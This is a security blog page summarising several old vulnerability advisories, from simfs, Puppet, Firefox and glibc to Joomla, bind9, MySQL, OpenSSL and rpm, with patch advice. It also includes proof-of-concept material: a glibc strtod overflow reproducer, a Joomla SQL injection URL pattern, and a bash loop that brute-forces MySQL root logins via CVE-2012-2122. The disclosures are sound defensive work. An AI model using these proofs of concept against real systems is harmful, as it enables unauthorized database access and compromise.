Blog Page

SimFS (VZ / OpenVZ) Security Vulnerability #PSBM-27641, #CVE-2014-3519

***UPDATE IMMEDIATELY – Vulnerability in simfs virtual filesystem***

A critical vulnerability in the legacy simfs Container filesystem was fixed. This affects OpenVZ and Parallels Virtuozzo Containers based on vzfs.

Note: ploop filesystems were not affected.

References:

http://www.webhostingtalk.com/showpo…0&postcount=38

https://openvz.org/Download/kernel/rhel6/042stab090.5

http://kb.parallels.com/en/122142

CVE-2013-4969: Puppet Vulnerability

Description

Puppet uses temp files unsafely by looking for a name it can use in a
directory, and then later writing to that file, creating a
vulnerability in which an attacker could make the name a symlink to
another file and thereby cause the puppet agent to overwrite something
that it did not intend to.

References

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4969

http://www.ubuntu.com/usn/usn-2077-1

Several Vulnerabilities in Mozilla Firefox, Thunderbird, Seamonkey



Updated software packages for Mozilla Firefox, Thunderbird, Seamonkey that fixes several recently discovered security issues is now available for nearly all operating systems and platforms.

You should upgrade your software immediately!




Patched and Secure Versions
If you are not using one of the versions below, you are vulnerable.

Firefox 18.0
Firefox ESR 10.0.12
Firefox ESR 17.0.2
Thunderbird 17.0.2
Thunderbird ESR 10.0.12
Thunderbird ESR 17.0.2
SeaMonkey 2.15





Related MFSAs

MFSA 2013-20
Mis-issued TURKTRUST certificates

MFSA 2013-19
Use-after-free in Javascript Proxy objects

MFSA 2013-18
Use-after-free in Vibrate

MFSA 2013-17
Use-after-free in ListenerManager

MFSA 2013-16
Use-after-free in serializeToStream

MFSA 2013-15
Privilege escalation through plugin objects

MFSA 2013-14
Chrome Object Wrapper (COW) bypass through changing prototype

MFSA 2013-13
Memory corruption in XBL with XML bindings containing SVG

MFSA 2013-12
Buffer overflow in Javascript string concatenation

MFSA 2013-11
Address space layout leaked in XBL objects

MFSA 2013-10
Event manipulation in plugin handler to bypass same-origin policy

MFSA 2013-09
Compartment mismatch with quickstubs returned values

MFSA 2013-08
AutoWrapperChanger fails to keep objects alive during garbage collection

MFSA 2013-07
Crash due to handling of SSL on threads

MFSA 2013-05
Use-after-free when displaying table with many columns and column groups

MFSA 2013-04
URL spoofing in addressbar during page loads

MFSA 2013-03
Buffer Overflow in Canvas

MFSA 2013-02
Use-after-free and buffer overflow issues found using Address Sanitizer

MFSA 2013-01
Miscellaneous memory safety hazards (rv:18.0/ rv:10.0.12 / rv:17.0.2)

MFSA 2012-98
Firefox installer DLL hijacking




Related CVEs:

91811 – CVE-2013-0769 Mozilla: Miscellaneous memory safety hazards (rv:10.0.12) (MFSA 2013-01)
891821 – CVE-2013-0762 CVE-2013-0766 CVE-2013-0767 Mozilla: Use-after-free & buffer overflow w/Address Sanitizer (MFSA 2013-02)
891824 – CVE-2013-0759 Mozilla: URL spoofing in addressbar during page loads (MFSA 2013-04)
891825 – CVE-2013-0744 Mozilla: Use-after-free when displaying table with many columns and column groups (MFSA 2013-05)
892142 – CVE-2013-0746 Mozilla: Compartment mismatch with quickstubs returned values (MFSA 2013-09)
892144 – CVE-2013-0748 Mozilla: Address space layout leaked in XBL objects (MFSA 2013-11)
892145 – CVE-2013-0750 Mozilla: Buffer overflow in Javascript string concatenation (MFSA 2013-12)
892148 – CVE-2013-0758 Mozilla: Chrome Object Wrapper (COW) bypass through plugin objects (MFSA 2013-15)
892149 – CVE-2013-0753 Mozilla: Use-after-free in serializeToStream (MFSA 2013-16)
892150 – CVE-2013-0754 Mozilla: Use-after-free in ListenerManager (MFSA 2013-17)




References:
http://www.mozilla.org/security/known-vulnerabilities/firefoxESR.html
https://rhn.redhat.com/errata/RHSA-2013-0144.html
https://rhn.redhat.com/errata/RHSA-2013-0145.html

CVE-2012-3480: glibc overflow vulnerability

This issue affects the versions of the glibc package, as shipped with RHEL 5 and 6 and Fedora 16, 17.

Note: this was just reported and an official patch from RHEL is not yet available.

Vulnerability details

multiple integer overflows, leading to stack-based buffer overflows were found in various stdlib functions of GNU libc (strtod, strtof, strtold, strtod_l and related routines). If an application, using the affected stdlib functions, did not perform user-level sanitization of provided inputs, a local attacker could use this flaw to cause such an application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.

* Upstream bug report:
[1] http://sourceware.org/bugzilla/show_bug.cgi?id=14459

* Upstream patch (might not be the final one):
[2] http://sourceware.org/ml/libc-alpha/2012-08/msg00202.html

* References:
[3] https://bugzilla.redhat.com/show_bug.cgi?id=847715

Sample reproducer from upstream bug

#include
#include
#include

#define EXPONENT “e-2147483649″
#define SIZE 214748364

int
main (void)
{
char *p = malloc (1 + SIZE + sizeof (EXPONENT));
if (p == NULL)
{
perror (“malloc”);
exit (EXIT_FAILURE);
}
p[0] = ’1′;
memset (p + 1, ’0′, SIZE);
memcpy (p + 1 + SIZE, EXPONENT, sizeof (EXPONENT));
double d = strtod (p, NULL);
printf (“%a\n”, d);
exit (EXIT_SUCCESS);
}

Reference: http://www.openwall.com/lists/oss-security/2012/08/13/4

2 Joomla SQL Injection Vulnerabilities Discovered

Two SQL Injection vulnerabilities were recently detected in the com_package and com_photo modules of the joomla Content Management System. Remote attackers & low privileged user accounts can execute/inject own sql commands to compromise the application database. The vulnerability is located in the com_package module with the bound vulnerable id parameter. Successful exploitation of the vulnerability result in database (Server) or application (Web) compromise.

com_package vulnerability:


Vulnerable Module(s):

  • index.php?option=com_package

Vulnerable Parameter(s):

  • id

com_photo vulnerability:

Vulnerable Module(s):

  • index.php?option=com_photo

Vulnerable Parameter(s):

  • AlbumId
  • key



Patching and Mitigation:

  • These exploits are in the early stages of discovery, and as such no vendor patches or fixes have been released at the present time. Updates will be posted when a patch or new release is available.

Proof of Concept:


The SQL Injection vulnerabilities can be exploited by remote attackers without privileged user account or required user inter action. For demonstration or reproduce …


Path: /
File: index.php
Module: ?option=com_package
Parameter: details&id=-1′[SQL Injection]–
URL: http://www.xxx.com/index.php?option=com_package&task=details&id=174-1′[SQL Injection]–

References:


http://www.vulnerability-lab.com/get_content.php?id=652
http://www.vulnerability-lab.com/get_content.php?id=654

bind9 denial of service (remote) (CVE-2012-3817)

Package : bind9
Vulnerability : denial of service
Problem type : remote
Debian-specific: no
CVE ID : CVE-2012-3817

Einar Lonn discovered that under certain conditions bind9, a DNS server,
may use cached data before initialization. As a result, an attacker can
trigger and assertion failure on servers under high query load that do
DNSSEC validation.

We recommend that you upgrade your bind9 packages.

mySQL vulnerabilities up to 5.1.61, 5.2.11, 5.3.5, 5.5.22

On Saturday afternoon Sergei Golubchik posted to the oss-sec mailing list about a recently patched security flaw (CVE-2012-2122) in the MySQL and MariaDB database servers. This flaw was rooted in an assumption that the memcmp() function would always return a value within the range -127 to 127 (signed character). On some platforms and with certain optimizations enabled, this routine can return values outside of this range, eventually causing the code that compares a hashed password to sometimes return true even when the wrong password is specified. Since the authentication protocol generates a different hash each time this comparison is done, there is a 1 in 256 chance that ANY password would be accepted for authentication.

Proof of Concept


In short, if you try to authenticate to a MySQL server affected by this flaw, there is a chance it will accept your password even if the wrong one was supplied. The following one-liner in bash will provide access to an affected MySQL server as the root user account, without actually knowing the password.

$ for i in `seq 1 1000`; do mysql -u root –password=bad -h 127.0.0.1 2>/dev/null; done
mysql>

Vulnerability Outline

  • All MariaDB/MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable.
  • MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
  • MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
  • This issue got assigned an id CVE-2012-2122.

Vulnerability Details

Here’s the issue. When a user connects to MariaDB/MySQL, a token (SHA
over a password and a random scramble string) is calculated and compared
with the expected value. Because of incorrect casting, it might’ve
happened that the token and the expected value were considered equal,
even if the memcmp() returned a non-zero value. In this case
MySQL/MariaDB would think that the password is correct, even while it is
not. Because the protocol uses random strings, the probability of
hitting this bug is about 1/256.

Which means, if one knows a user name to connect (and “root” almost
always exists), she can connect using *any* password by repeating
connection attempts. ~300 attempts takes only a fraction of second, so
basically account password protection is as good as nonexistent.
Any client will do, there’s no need for a special libmysqlclient library.

But practically it’s better than it looks – many MySQL/MariaDB builds
are not affected by this bug.

Whether a particular build of MySQL or MariaDB is vulnerable, depends on
how and where it was built. A prerequisite is a memcmp() that can return
an arbitrary integer (outside of -128..127 range). To my knowledge gcc
builtin memcmp is safe, BSD libc memcmp is safe. Linux glibc
sse-optimized memcmp is not safe, but gcc usually uses the inlined
builtin version.

Patch Details


The password.c source can be patched against this vulnerability by replacing line 534 with:

return test(memcmp(hash_stage2, hash_stage2_reassured, SHA1_HASH_SIZE));

Vendor Patches


Please check with your current OS vendor to see if patched binaries are available for updating.

Let us patch it


Click on “schedule a consultation” to have our experts ensure your database security.

OpenSSL Still vulnerable, fix CVE-2012-2110 not sufficient!

It was discovered that the fix for CVE-2012-2110 released on 19 Apr
2012 and referenced in this post on unhackable, was not sufficient to correct the issue for OpenSSL 0.9.8.

Please see http://www.openssl.org/news/secadv_20120419.txt for details of that vulnerability.

This issue only affects OpenSSL 0.9.8v. OpenSSL 1.0.1a and 1.0.0i already contain a patch sufficient to correct CVE-2012-2110.

Thanks to Red Hat for discovering and fixing this issue.

Affected users should upgrade to 0.9.8w.

OpenSSL Vulnerabilities – CVE-2012-2110, CVE-2006-7250, CVE-2012-1165

Summary:

An application using OpenSSL could be made to crash or run programs if it
opened a specially crafted file.

Software Description:
- openssl: Secure Socket Layer (SSL) cryptographic library and tools

Details:

It was discovered that OpenSSL could be made to dereference a NULL pointer
when processing S/MIME messages. A remote attacker could use this to cause
a denial of service. These issues did not affect Ubuntu 8.04 LTS.
(CVE-2006-7250, CVE-2012-1165)

Tavis Ormandy discovered that OpenSSL did not properly perform bounds
checking when processing DER data via BIO or FILE functions. A remote
attacker could trigger this flaw in services that used SSL to cause a
denial of service or possibly execute arbitrary code with application
privileges. (CVE-2012-2110)

[Security Update] Important Vulnerability found in rpm

Updated rpm packages that fix multiple security issues are now available for Red Hat Enterprise Linux 5 and 6; Red Hat Enterprise Linux 3 and 4 Extended Life Cycle Support; Red Hat Enterprise Linux 5.3 Long Life; and Red Hat Enterprise Linux 5.6, 6.0 and 6.1 Extended Update Support.

The Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.

The RPM Package Manager (RPM) is a command-line driven package anagement system capable of installing, uninstalling, verifying, querying, and updating software packages.

Multiple flaws were found in the way RPM parsed package file headers. An attacker could create a specially-crafted RPM package that, when its package header was accessed, or during package signature verification, could cause an application using the RPM library (such as the rpm command line tool, or the yum and up2date package managers) to crash or, potentially, execute arbitrary code. (CVE-2012-0060, CVE-2012-0061, CVE-2012-0815)

Note: Although an RPM package can, by design, execute arbitrary code when installed, this issue would allow a specially-crafted RPM package to execute arbitrary code before its digital signature has been verified. Package downloads from the Red Hat Network are protected by the use of a secure HTTPS connection in addition to the RPM package signature checks.

All RPM users should upgrade to these updated packages, which contain a backported patch to correct these issues. All running applications linked against the RPM library must be restarted for this update to take effect.